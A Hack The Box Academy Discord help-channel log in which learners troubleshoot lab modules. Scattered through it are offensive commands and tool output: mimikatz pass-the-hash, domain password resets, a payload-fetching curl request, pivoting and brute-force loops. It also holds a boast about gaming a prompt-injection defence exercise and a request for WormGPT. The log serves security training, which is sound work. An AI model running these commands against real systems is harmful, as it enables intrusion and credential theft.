In the traditional WPA password attack when i execute sudo airmon-ng start wlan0 it says wlan0 not found i am completely new to this and dont wanna seem dumb
Hello everyone I’m new here
wlan0 would be your wireless adapter, generally speaking. But i'm assuming this is related to the HTB module on wpa attacks? if not then it's not an appropriate question for here
wifi password cracking techniques
are you ssh/connected to the target machine?
am i meant to do anything else other then to spawn the target and launch the instance
"launch instance" spawns the in-browser vm, that doesn't connect you to the target
so what do i have to do because ive read the first fundamental module but i still dont understand
typically there's instructions at the top of or just above the question that provides instructions on connecting to the target
can you share a link to the module?
just as i thought
there's instructions to rdp to the target just above the question
(there will be the ip between the words "to" and "with")
so what do i do with that
... you RDP to the spawned IP with the username "wifi" and the password "wifi"
the pwnbox should have xfreerdp installed
I think they just wanted to jump into the Wifi Pentesting module straight away
yeah, lots of basics missing
RDP [remote desktop protocol] is a remote protocol to connect to machines, generally supplying a GUI to work from
hm? where do you think i should learn the basics
well for one the Information Security Foundations Skill path teaches a lot of the basics
i appreciate
you kinda just leaped forward a bit
i think best is to choose a path
not saying you wouldn't be able to complete it, but you're just gonna have 10x the struggle
there's also a BUNCH of more basic wireless pentesting modules
The name sounded more friendly.
'Wifi Password Cracking'
rather than 'Wifi Pentesting Techniques'
marciee android pen testing path is tier 2 content?
1 tier 0, 5 tier 3
ohh ohkk
i also just checked..so my student subs will not cover that
nop
but it was fun
well thanks im gonna pick the path i just didnt see
You liked the name didn't you.
because you wanted to learn how to hack your neighbors wi-fi
😂
it's a joke
he would have been watching youtube videos right now if he wanted to hack neighbours wifi lmao
clicked on the first thing i saw
more than enough
just take a path
With my 3gb upload and download i dont think id want their 100mbps
clicking on the first thing you see? Boy do i have a definitely not sketchy link for you
london
isnt it useless?
3Gb?
well if u can have it why not and its not entirely useless
anyway this is straying off-topic
the top of the list @keen canopy is generally gonna be the "latest" module
why you have 3gb connection..do you distribute internet to neighbours?😂
okay
nah dont like my neighbours
i am sitting here with 100 mbps connection
ANYWAY TO REIN IN FROM OFF-TOPIC COUGH COUGH
if you wanna continue the conversation in another channel, @keen canopy you'll need to link your hackthebox account to the discord via the instructions in #welcome
TAKE COUGH SYRUP
or you can dm me
yeah i am rn
guys, I'm currently practicing user management and permissions in the linux fundamentals module, and I have a weird issue in my VM. so I created two users dr_luna_cosmos and morgan_nebula, I created a folder telescopes and inside it, user morgan_nebula added a file telescope1_maintenance_log.txt
Now, I'm logged in as dr_luna_cosmos through su command and I can't edit that file, I keep getting "Permission denied" error in nano. But all of the permissions look right, that user should be allowed to save this file... What is happening?
Need help with the VPN. I built a new Kali box and when connecting to the VPN I lose connection via SSH/RDP
does anyone know if HTB uses the IP range 192.168.10.0/24?
appears so, I may need to reip my entire homelab 🙁
Why can't I text on general?
Yes
Yo guys. Real quick question. Basically my school doesn't have an IT department and since I'm the only one in my school who knows a little bit about computers they asked me to "control" the WiFi and make sure no one uses it for bad things.
I was looking for an easy app or something like that so I could control the WiFi remotely from my android. Any recommendations?
Not the right channel, please follow the instructions in #welcome to gain access to a more appropriate channel. I doubt anyone can help you with this, sounds fishy too.
@normal vigil This isn't the server for that type of discussion.
PLS HELP ME, Hello, I think I found the answer to the first question in the “Antak Webshell” section of the Shells & Payloads module, but it's not accepting it. I've tried all possible patterns, but it's not working. Could you please help me?
I'm doing the File Transfers module and maybe I missed it, but why would somebody prefer cat foo.bin | base64 -w 0 rather than base64 -w 0 foo.bin ?
No reason, I'd prefer the latter myself, but I guess the command in the text is more clear about what it does.
That makes sense in context as the author does break down what the components do.
im solving **Using the Metasploit Framework**
the question is
Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer.
i got the shell but
(Meterpreter 2)(unknown) > whoami
[-] Unknown command: whoami. Run the help command for more details.
(Meterpreter 2)(unknown) > dir
[-] The "dir" command requires the "stdapi" extension to be loaded (run: `load stdapi`)
(Meterpreter 2)(unknown) >
please help
Enter “shell”
i did but still
i did that but its says stdapi something
(Meterpreter 1)(unknown) > shell
[-] The "shell" command requires the "stdapi" extension to be loaded (run: `load stdapi`)
(Meterpreter 1)(unknown) > load stdapi
Loading extension stdapi...
[-] Failed to load extension: uninitialized constant Rex::Post::Meterpreter::Extensions::Stdapi::Stdapi
Did you mean? STDIN
(Meterpreter 1)(unknown) > shell
[-] The "shell" command requires the "stdapi" extension to be loaded (run: `load stdapi`)
(Meterpreter 1)(unknown) >
wht
@velvet geyser either or, depending on your skillset, you may find it better to do boxes first. most boxes ive done didnt require much in terms of using socks
can i get some help on password attacks for the assessment. i need a hint as to what i may or may not be doing right
https://academy.hackthebox.com/module/315/section/3771
please could someone help me for this. i always get this
curl -X POST http://127.0.0.1:8081/workflows\?url\=http://127.0.0.1:8000/pwn9.war
{
"code": 500,
"type": "InvalidWorkflowException",
"message": "Failed to parse yaml."
}
i follow all instructions but, nothing💔 I've literally finished all the module except this part. I can't take it anymore.
this is Model Deployment Tampering of the Attacking AI - Application and System module in the AI red teamer path
please help me
apt list | head and you'll get your answer
i dont think i see it honestly
there's an extra line being counted somewhere 😉 look carefully
also try not to spoil/reveal answers @cunning fern
oh sorry i couldve used || || right
doesnt spoiler tag rly talk for itself
that's not really the point i'm making lol. Doesn't take from the fact that anyone can still click on it and reveal the answer. This is a server with aspiring hackers, human curiosity is the biggest thing here
ok i understand now lol thats interesting
ok i understand it all now thanks for the nod
I want a link to enter WormGPT, please and thank you
You really don't need any hint
on any of the ai prompt injection defense modules, you can set your system prompt so that the "key" equals a slur, than the key wont be given out at all since the censoring system works so well lol
thats how i passed all 3 haha
Format:/path/to/antakwebshell
Anyone give me a hint on Windows Lateral Movement > WinRM > Question 3? I can't seem to get around the double hop problem to get to DC01 as Leonvqz despite performing PTT on SRV02
How many firewall rules are enabled? in pentest in a nut shell module
Hi Guys, I'm preparing for OSCP but before buying the course I'm planning to study HTB Academy Penetration Tester Job path role. Can anyone suggest me what are the modules should I study in HTB Academy which will be helpful in the OSCP exam?
Thank you!
Wouldn't that require knowing what's on the exam?

hey everyone i had a quick question im not sure if i should ask in plain text or with log to avoid spoiling anything? its like the first step tho so i dont think it will be an issue, so my question is when trying to ssh even myself i get denied (publickey) and cannot figure out how to have it make me a private set 😭, im using a virtualmachine of parrot
Send a picture
okieee one secc
this is the original attempt and can scroll down a bit too if you need lmk
Use the target IP not 127.0.0.1 😄
Hey everyone, struggling on the Password Attacks skills assessment.
I found creds for hw on the JUMP01 box and the creds indicate I should be able to get into the FILE01 box with the creds. However I’m unable to RDP into file01 with the creds
Anybody open to giving me a few pointers?
Have you run ligolo?
When will DNS use TCP instead of UDP?
"When the connection with UDP fails, typically when the packet size is too large to push through in a single UDP packet"
can the packets just be split up?
Hello! Someone in Skills Assessment of Attacking AI?
It uses both

Hi all, I've been doing the 'ACL Abuse Tactics' section of the Active Directory Enumeration & Attacks module. I got stuck on the part where we change the user damundsen's password by following the examples. Set-DomainUserPassword cannot find the user at all, even though functions such as Get-DomainUser and net user are able to find the user's info. I've tried using both the SID and DN instead for the -Identity arg but they also dont work.
The commands I used so far:
$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
how many modules have you done?
Check if you have the correct password for wley
i have the correct password but still unable to find
I was able to replicate your error by using a wrong password for wley
even with the correct password for wley which i got from the previous sections, i'm still unable to change damundsen's pwd
After correcting the password, the output should look like this
If you are certain you have used the correct password, consider resetting the entire lab environment
If you are still stuck you can DM me
Rest assured, I've tried all the patterns.
If I send you my answer, will you check if it's right or wrong?
You can dm me if you want
Hey guys, I need help:
Module: Password Attacks
Section: Skills Assessment
Problem: I was able to login to jbetty and searched around until I found some credentials for the user for FILE01 ssh. The problem is that I'm trying to ssh to file01 using that user but it just gives me a blank line without asking for the password. I tried all methods looking for other credentials but wasn't able to find anything, am I just going completely wrong? I saw a walkthrough online that said to use proxychains for enumerating then pivoting but this wasn't mentioned at all in the modules (only in the pass the ticket from linux section), when I tried following that method I had so many errors saying that the channel couldn't open so I'm not sure its the right method.
Any advice?
does anyone have this issue when doing the icmp tunneling with SOCKS , in the ubuntu server, when you try to run "" sudo ./ptunnel-ng -r10.129.202.64 -R22 """
And you got the error regarding libcrypto so 3? How to resolve? i was using the sandbox environment that they gave.
iirc, you should think of a GUI service on FILE01
Moin, quick question regarding the Skill assessment for Pivoting and Tunneling.
I'm using my own Kali VM with the VPN profile (tried both TCP and UDP).
So I know what I'm supposed to do but I'm hitting the part where I need to do the pivot and I cannot seem to grasp how I can make proxychains/port-forwarding work.
So if I do ssh -D 9050 ... and run proxychains nmap <IP> --top 25 -sT -v -Pn all ports show as filtered.
I then tried to use metasploit and I have this setup:
msf6 auxiliary(server/socks_proxy) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run
[*] Running module against inlanefreight.local (10.129.66.195)
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.129.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.16.0.0/255.255.0.0 from host's routing table.
[*] Post module execution completed
msf6 post(multi/manage/autoroute) > sessions 1
[*] Starting interaction with 1...
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.129.0.0 255.255.0.0 Session 1
172.16.0.0 255.255.0.0 Session 1
172.16.5.0 255.255.255.0 Session 1
meterpreter >
but I hit the same "filtered" wall. am I missing something or is this a HTB VPN + proxychain quirk?
I ran into this problem before in the pwnbox but couldn't figure it out. Parrot VM worked just fine tho
All I can say for certain is the problem isn't on the ssh target
using pwnbox is just ignoring the symptoms. when taking CPTS later I dont want to run into these issues and wasting time. I'd rather understand how to make it work :/
Pwnbox has this problem
My own Parrot VM doesn't
oh wait what..? I misunderstood.. I'm not even using Pwnbox tho. I'm using a local KaliVM..
But I haven't had the time to revisit this issue yet.
Most likely it's some settings/version issue... I guess, lol
Instead of ssh -D 9050 ... and meterpreter I also tried sshuttle -vv -r webadmin@10.129.66.195 172.16.5.0/24 --ssh-cmd "ssh -i id_rsa" but then running nmap or similar reports ALL ports as open instead of filtered.
this SA drives me nuts
Try using sudo with the proxychains nmap command, e.g., sudo proxychains nmap....
Pretty sure I've tried that before. But if I haven't, I'm dumb
oh ffs if thats the solution I just retire and become a goat farmer
I'll be your retire buddy
sudo proxychains ... seems to be the solution

I am doing Skills Assessment - Password Attacks
after initial access, i rdp into jump01 with the creds found and I am stuck here, any hints please?
I can confirm it works on the pwnbox as well. Somehow last time I tried everything BUT sudo. I feel dumb.
No sudo needed on my Parrot VM. The problem could be version specific.
O
Without spoiling it too much, you can find a hint on the desktop right after you successfully RDP into JUMP01.
I was mistaken, the rdp is to jump01 not file01
is it the same?
info
My bad. I meant JUMP01 as well. Did this a couple of weeks ago, so my memory of it is a bit fuzzy. Just look at the desktop, there should be something of interest.
can i dm you?
Sorry I can't I'm in the middle of something rn
np
Just use Ligolo-ng.
It really is the best tool for pivoting imo.
agreed, I did initially but the initial foothold webshell made me lose the channel all the time so I wanted to try other techniques
Hi folks, can anyone give me nudge for Password attack skill assessment?
I got the creds of hw and I can do rdp to JUMP01 as well as found shares using nxc on FILE01
just for the sake of learning did the double-pivot with ligolo-ng again. its def a good option
spray every creds you get
and check what you can do with that
if you want more help you can dm me
Why can't I talk in general?
Is anyone free to assist with the pass the certificate part of password attacks module? Stuck on the administrator part, able to get the certificate but unable to do anything with it as it says invalid password or PKCS12 data
Read and follow #welcome
what is the reason of this error ?
mimikatz(commandline) # sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe
user : julio
domain : inlanefreight.htb
program : cmd.exe
impers. : no
NTLM : 64f12cddaa88057e06a81b54e73b949b
| PID 7720
| TID 7724
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS
mimikatz(commandline) # exit
Bye!
Attacking common web applications- Splunk section. Target machines have no connectable endpoints but show ports open. Been this way a week. Any info appreciated Edit: prtg connects but splunk web server no go. Ports show open as in the walkthrough only prtg is connectable
Which port is shown as opened?
How do I even connect?
https://academy.hackthebox.com/module/33/section/183
This is the module
--skip-ssl ?
Oh! I tried --skip_ssl my bad! Thank you
you should have a similar nmap to mine
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
8000/tcp open ssl/http Splunkd httpd
8080/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
8089/tcp open ssl/http Splunkd httpd
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
connect with https://IPhere:port instead of http too.. probs that
yesterday the host 172.16.5.5 wasn't up and I spent 2 hours trying to solve the question
thinking i'm missing something
but no ,today I ran nmap again and voila it's up
question solved 5 minutes
i never thought of restarting the machine, will this happen to me when I start the exam?
I need advice for the exam
I just spawned the splunk instance, https:// is only way to get access via browser.
Thank you
Did anyone manage to get a reverse shell off PRTG outfile.ps1 executable method ? I can't seem to get anything back to my netcat listener. Attacking Common Applications - PRTG Network Monitor
Yes. Did you run a test notification to trigger the shell?
I have yeah got the "EXE notification queued up" message no errors
tried two different pshell oneliners now, maybe i need a different list of payloads then if you got it to work!
Could be
ty tho... i can keep digging now
Hello ! Can someone give me a little tips for this question in the Footprinting module in the SNMP section: " Enumerate the custom script that is running on the system and submit its output as the answer." ? Thanks 🙂
enumerate using snmpwalk.
The resources tab on Reporting module has Sample Report.zip, but I can't seem to unzip it, "The archive entry was compressed using an unsupported compression method."
any ideas? windows errors out and linux says I require a PW for the file
For lfi skill assessment. I did exactly as I saw in walkthrough but doesn't seem to work when I inject shell I get internal server error
Android Application Malware Analysis.
Unraveling Embedded Custom VM. I followed steps-by-steps. But I can't get a flag.
Here is what I did:
Installed pedometer.apk on the Android emulator.
Launched the app and granted the Physical Activity permission.
Set the emulator to Charging mode.
Enabled Airplane Mode when the step counter showed 12, 13, or 14.
Switched Charging → Not Charging in the emulator battery settings.
Increased the step counter until it reached 86 steps
I can't find what i did wrong..
hi guys i am stuck at file uploads modules...anyone willing to help?
From the Linux Fundamental course i am unable to get the correct answer the question is what is the name of the network interface that MTU is set to 1500?
Can any one help me
@frigid python use ifconfig
Advanced deserialization attacks - Example 1
the PresentationFramework is not there, when I click show potential solutions
any hints ?
Hello people, login brute forcing module, login forms. I have modified hydra to match the pattern, but it stops at 16 results out of 3400 and doesn't go anywhere for more than 10 minutes
I had to post here to figure it out, haha, it has to be imported from the 7 dotnet shared folder
Quick question on Inveigh - trying to use it for AD Skills Assessment PT 2 -- I can't get SMB Capture to switch to enabled. Any idea how I do this?
I'm doing AD Skills Assessment II and I couldn't find the credentials for "Use a common method to obtain weak credentials for another user" so I looked it up and all the write ups say "just password spray for password X" now I'm wondering how was I supposed to know that
Welp, thanks for the nudge lol
There's like 3000 users, password spraying just one password takes like 20 minutes
So was I supposed to spend hours on this? I don't get it, the password policy doesn't help at all in guessing this
Which section and which question
For the future, I wouldn't spoil something like that. I'm actively working on this assessment and module, and that just kind of gave away what I'm supposed to do
should i dm you the further details?
No, you can send it here
i am trying .pHp it got uploaded successfully
but my code is not executing
@opal shuttle
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst
For example, this list
thanks man i will try bruteforcing with this list
i tried but same issue
my code is not being executed
What PHP code did you write?
i tried both hello word and webshell
nothing works
Did you visit the correct URL path?
yeah i am not getting file not found error
its just blank i am not getting anything in output
@quiet heart bro i am about to shutdown my pc and pls help me to figure that out?
I tried now with one of that extension with simple PHP code and its works, so make sure again to try these extensions
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst
Now stuck with unable to load PresentationNative_cor3.dll if anyone knows about the #$%#$ visual studio please give me ahint
Guyss any red team?
i have tried all...can i dm should i have something which i cant discuss here
can anyone help with password attack assessment? im stuck on a point and need a nudge
Whatcha got @median kettle
@grizzled schooner so i managed to pivot to the internal host (jump) and found a file i wanna look at, problem is, its an Excel spreadsheet, and i am not sure how to view it since the machine doesnt have excel, and i only have terminal access to the dmz
Hmm, I don't remember needing an excel file
it says online passwords, so i figured it would be worth peeking at, ive tried looking at cmdkey /list and windows cred vault. not seeing anything.
i have noticed two applications for password storage, however i am unsure of what to do with them.
What applications are you seeing?
password safe 3 and remoteNG
I will tell you you're staring at the answer then. Look more in to those applications, what they require, what files you have and haven't searched for
check ty
Gotchu
Oh I'm pissed - when using kerbrute to make a userlist - I outputted to a text file - but it includes timestamps, domain, date, whether or not the username is valid or not... Is there a way to get rid of that?
if it's a formatted text file, you can always use something like awk to select only the columns you want
ty
hello can anyone help? i am doing cbbh using proxies module and can i ask question here?
you can use the awk command in linux, just use the $ to specify the column you want to keep and cat it to a new file
hello guys, I am in File Upload Attack module, which i am doing blacklist filter, it is asking me to upload a file which is not in blacklist, i did upload, but when i visit uploaded file, it just reading back the content of the code, how can i make it work?
- 1 Try using request repeating to be able to quickly test commands. With that, try looking for the other flag.
doing the ping burp suite and i do this command ip=1; find /* -name *.txt it found 2 flag.txt but they are the same i already found 1 and i need to find the second one also flag.txt
🤚 Looking for a long-term U.S. partner — great rewards await. D!!!M if interested!
for what?
where are u?
doesn't matter
Not the place for this
help me understand the error please
I'm going through the module https://academy.hackthebox.com/module/255/section/2911 (Live\Ghost SPN-Jacking)
I'm specifically performing a Live SPN-Jacking attack. I deleted the SPN from one of the hosts, assigned this SPN to the target host. Then I requested a ticket and changed its SPN, everything as shown in the Module. There were no authorization errors when receiving a ticket and no errors when changing the SPN in this ticket. But when trying to connect via WinRM, an error occurs, the ticket is deleted
What am I doing wrong?
did anyone face an issue where using ligolo-ng crashes the domain controller in the AEN module for the double pivot?
I've been password spraying for the last 1.5 hours... can anyone help me out for Q4 on AD Enumeration and Attacks | Skills Assessment Pt2 please @ with replies
the problem solved itself)
you are doing correct thing, just keep doing it on domain users and maybe try simple password not rockyou
academy modules give you an example of simple/common password
I'm using that pw lol
I've been going for probably the last hour and 45 mins now - although I'm running it against jsmith, because that's all I had that made sense
if I remember it correctly I used user account to dump users with ldap and then used common credentials to password spray
No user I have can dump anything... but I'll look again I guess
You might be missing something. As I remember the password spraying part took me only a couple of minutes tops.
Wouldn't shock me - I'm not cut out for this, but spent enough money figured might as well finish out the modules lol
How to get retired htb boxes's writeups in pdf format
Partner up with me 😀 in the U.S. — long-term, rewarding, and worth it. Message me!
You need a subscription
Why are you using jsmith when you can just dump all users with one of the credentials I assume you already have? hmmm...
Both I tried didn't work unless my lab has been broken for 2 hours lol
Dude, not the place - take it elsewhere
Usually you never have to bruteforce for more than 10 mins tops not even talking about an hour in any module
<@&861185840277487616>
That's what I thought... I've been getting frustrated, but I got nothing
You got it just try using ldap since you are on Q4 you already have what you need to enumerate domain users
I tried ntds, lsa, sam and lsass -- got errors on all 3 for perms
also tried --loggedon-users with nxc got nothing
maybe try users flag on nxc
...goddamnit
Maybe the user you need isn't logged on?
Sometimes I love you guys, other times I hate you lmfao - I had to restart my lab sesh anyway, will give that a try
Yeah hackthebox always makes us scratch our heads dd
Would you rather just have us tell you the solution lol
lmfao
Pentester path was one of the best courses I have done in a while honestly
The AD skills assessment is one of the best designed skill assessments I've done so far
<@&861185840277487616> can we get this dude to stop? Like the 4th time they've mentioned this
How's that dude not getting banned
hi for the Kerberoasting - from Windows section of AD Enumeration and Attacks, I am having trouble with the second question. So the program they tell me to use has a syntax error. Its written in Python. I would use Python2.7 like they are telling me but I have Python3 version of it installed. But when I run the program (kirbi2john) there's a syntax error. This is the same program they are telling me to use. It should work ideally. This is the program that converts the other file I generated from other output into a format that can be cracked by password cracking program.
so the Python script built into Kali won't run
can someone help me with this?
I can't get more specific without spoiling it
```
Traceback (most recent call last):
  File "/usr/bin/kirbi2john", line 50, in <module>
    if et:
       ^^
NameError: name 'et' is not defined. Did you mean: 'set'?
```
I already did
I tried running kirbi2john in python2.7 and got this:
└─$ python2.7 /usr/bin/kirbi2john crack_this.kirbi
Traceback (most recent call last):
File "/usr/bin/kirbi2john", line 22, in <module>
from pyasn1.codec.ber import decoder
ImportError: No module named pyasn1.codec.ber
@frigid python ip link show (interface name here)
I didn't have issues with this when I did the assessment, but have you tried installing kirbi2john in a virtual environment? If there is an issue with the Kali version, it might help to get a fresh copy of it
this is in a kali VM. you're saying to make a VM inside a VM?
I mean a Python venv
ok fair
but its not the assessment
its question 2 of kerberoasting from windows section of AD enumeration and attacks
so about half way through the module
is where this section is
I completed question 1 this is in order to answer question 2
@heavy mango can I DM you later maybe you can help me with this one on one? I'm scared if I get too specific I'll spoil the information which I have already been yelled at on here for.
Yeah, no worries. I'll be around for couple of hours
ok cool talk to you then
I’m stuck in Bash Scripting (Easy) is this the chat to discuss code and questions?
@languid fjord I have sent a DM to you, kindly have a look at it.
Password Attacks
Module Pass the Certificate
What are the contents of flag.txt on Administrator's desktop?
hey I have a problem in the file upload module whitelist flag , I got the flag but it didn't work
Content above Tier 0 modules can't be given away... You can receive a nudge or help to get the answer though
Hey mate -- tried one pw, that didn't work... haven't spent 40 mins with nxc being slow on another... what am I missing?
Now nxc and CME just time-out when attempting to do anything lol
Need to speak to a person? Learn how to reach our support via HTB Labs.
For those interested, running the same script on Mac produces a different number than on Linux. It’s something to do with the type of encoding between the two systems. Linux wraps, so it causes extra characters, which the answer is looking for.
I'm currently doing the AEN section but I'm not able to get bloodhound data using bloodhound-python or bloodhound-ce. I've never had issues with these commands up until now. The module uses Sharphound to collect the data but I prefer to use the former methods. Can anyone confirm if they are experiencing the same thing?
hey was doing the "Android Application Static Analysis " module, got to the part of "Reversing Hybrid Apps" where i now completely stuck on the first question where we need to analyze "myapp_hybrid1.apk" someone also doing this/ or did this already?
try using linux commands to search
Does anyone have a second to help me with https://academy.hackthebox.com/module/109/section/1038
"Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found. "
I've confirmed with my notes and reset the target machine. Can't get the command to run at all no matter what I do. Tried Linux only as well as Linux and Windows command bypass characters.
Did you find the flag in the previous section?
Yup, you need it for this one to cat the home directory
okay, try using some other possibly blacklisted bypasses from that section and the previous section
Not sure what else to try. I've tried all of the other bypass options
if you were able to get the directory from the previous section, try using a bypass again. I'll give you a hint, you've probably already used one. The other is in that section's reading
if you're still stuck you can pm me
I'm doing the pillaging section in windows
I have the cookie and admin priv. Whenever I enter Grace's cookie in the site nothing happens to the page.
Firefox also after a certain amount of time detects the cookie plugin and disables it
Yes we discussed
hello can i get a help on the nosql skill assessment 2 ? || i know that the username is passive of injection because when i modify the javascript the this.username for this.any the application respond with a 500 ||
Just ask your module related question here.
How can i bypass the last section
No one knows what you're working on. Always best to say the module, section, and question you're on. What you've tried, etc. Remember to take care not to reveal content from modules above tier 0.
Hi I have completed section "Credential Hunting in Windows" from "Password Attacks" but I have few questions I didn't search anywhere directly dumping them here
- Why did LaZagne's cmd window close automatically when task is completed??
- And if I didn't use findstr and manually did searching and also findstr didn't give all the files that are useful
- What is the right way to do the lab??
You can DM me
its for https://academy.hackthebox.com/module/143/section/1508
could someone please give me a bit of assistance as im a bit confused why a password isnt working for this
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"
as for the command the password in the section but not the 1 above
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240
am I meant to break the password from the impacket lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 ?
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
I too have that same question, dont have enough knowledge to provide help
@heady sapphire don't reveal answers
sometimes a tool can miss something
that's why it's important to know multiple methods to gather information
is this for me?
considering you said you had the same question 😉
when I go back for a second round of the pathway going to read re the note I left from this convo
so there is no route to the host... something wrong with the VM module?
└──╼ $impacket-lookupsid logistics.inlanefreight.local/htb-student_adm@172.16.5.5
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation
Password:
[*] Brute forcing SIDs at 172.16.5.5
[*] StringBinding ncacn_np:172.16.5.5[\pipe\lsarpc]
[-] [Errno Connection error (172.16.5.5:445)] [Errno 113] No route to host
ok so it was wrong with the HTB VM...
└──╼ $ping 172.16.5.5
PING 172.16.5.5 (172.16.5.5) 56(84) bytes of data.
64 bytes from 172.16.5.5: icmp_seq=1 ttl=128 time=2.95 ms
64 bytes from 172.16.5.5: icmp_seq=2 ttl=128 time=0.513 ms
^C
--- 172.16.5.5 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.513/1.733/2.954/1.220 ms
In AEN module, I exploited SysaxAutomation and added the ilfserveradm user to the local administrators group. But I still cannot access the administrator flag. Any help?
hi guys , for password attacks skill assessment. https://academy.hackthebox.com/module/147/section/1356 i need to get the proxychains going ,
i have used ssh -D 9050 user@<DMZ01> command and have it running in a different pane
reinstalled proxychains and have socks4 127.0.0.1 9050 under the [ProxyList]
but it somehow isnt working, my most basic nmap scans with proxychains are giving no results
i think with proxychains and nmap you got to use -sL
my brain is super fried doing AD module
thats a list scan. i need to scan ports
which one
yours should be the URL of the skills
u need to go skill assessment password attacks and launch target . thats the DMZ01
ahhh its passwords attack module
yes
yeah it be useful next time to just paste the URL....
like so
https://academy.hackthebox.com/module/147/section/1356
oh got it , didnt know what u meant by URL
... its the link at the top of a webpage...
https://en.wikipedia.org/wiki/URL
so where you up to ?
are you asking me?
nah trying to help Azi although good luck with bug hunting
i have access to the initial DMZ01 foothold and need to proxychain through it. thats the part which is not working for me
I also need some help with it, I want someone to tell me how do I get started
thats with SSH correct?
this is modules page , go to #careers-and-certs i think
that's private
oooh you are brand new to hacking then....
I would recommend doing THM first then once gaining more skills come back to HTB
its quite rough out here on HTB
oh surely
im about 72% done on the CPTS pathway but only understand about 40% or so
what's cpts
this
https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist/
so you no access to the DMZ01 VM?
oh VAPT basically but htb certified
oooo my bad misread and brain still fried
possibly not sure what VAPT but if its a certification that is recognised then yeah
VAPT is a skill, also known as vulnerability assessment and penetration testing
are you trying to get to the JUMP01 VM?
hey btw what's account identifier in htb
yes but I cannot find anything named account identifier
its a long road for you...
then fill up a little gas in my vehicle, I'll be grateful
Browsing to the mentioned link there you will find the account identifier
Click on the link in #welcome then you should find it here:
help anyone ? my proxychains still doesnt work
thankyou sir
yes, I did, wondering why I couldn't land on that page via surfing the website myself
nmap will attempt to ping the target which won't work through proxychains (proxychains doesn't support ICMP), stop nmap from pinging the target and it should start working
sudo proxychains -q nmap -sT -Pn -n --disable-arp-ping --top-ports 100 172.16.119.10 -v this is my command . no ping and connect scan
no ports are showing up as open in all 3 ips
can you try a --packet-trace to see whether the packets are getting sent through the proxy?
CONN (90.2248s) TCP localhost > 172.16.119.10:8080 => Connection refused
adjust_timeouts2: packet supposedly had rtt of 15016348 microseconds. Ignoring time.
im getting these for every port
try using proxychains4 (I believe this has a different config file) and socks5
instead of an nmap , is there anywher to check if the proxychain is working or even setup properly
netcat listener on remote + a curl from local to the other interface of the remote
alternatively just transfer a static nmap binary, you won't have scripts but it'll be good enough
meaning run nmap on the remote DMZ01?
yeah, you could also just use metasploit's nmap/proxy
Hello I'm stuck in the Footprint ( CPTS ) in the DNS section we have to find an FQDN can you help me I tried everything
lookup the name server of the domain and you'll see it
there's two but htb is asking for one of them
.
Hello world
Hello everyone
I'm new and I would like to learn hacking, is it possible?
or here I can learn cyber security
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Ok
okay sorry
No problem
Role pls
Read and follow #welcome
Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.
hi guys, if i download the file.zip and then i submit the hash the exercise say that it is not correct
i saw also write up and the hash it's the same
hints?
I can't find my account identifier
okay trying now
@quiet halo I don't get it
Follow #welcome
can someone help me in the footprint for DNS where we have to find the last FQDN
What exactly do you mean by „last FQDN“?
What is the question in the module?
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
hey hanging here https://academy.hackthebox.com/module/221/section/2630 (android static analyses).. whatever i send to the host i get invalid creds not sure is there some trick ?
Ah, my favorite question.
Ultimately it is about finding all zones.
|| Keep in mind that not all zones allow zone transfers. The module will show you what you can do in that case.||
|| Yes it's the brute forcing but I'm blocked||
To avoid spoilers, I sent you a direct message.
what command are you running
|| for sub in $(cat /opt/seclists/Discovery/DNS/subdomains-top1million-5000.txt);do dig $sub.inlanefreight.htb @10.129.42.195 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done||
what task/question are you on?
- 1 What is the FQDN of the host where the last octet ends with "x.x.x.203"? DNS in the footprint
Module: Windows Lateral Movement
Section: Skills Assessment
Question 2: What's the content of the flag located at C:\Users\Arturo\Desktop\flag.txt
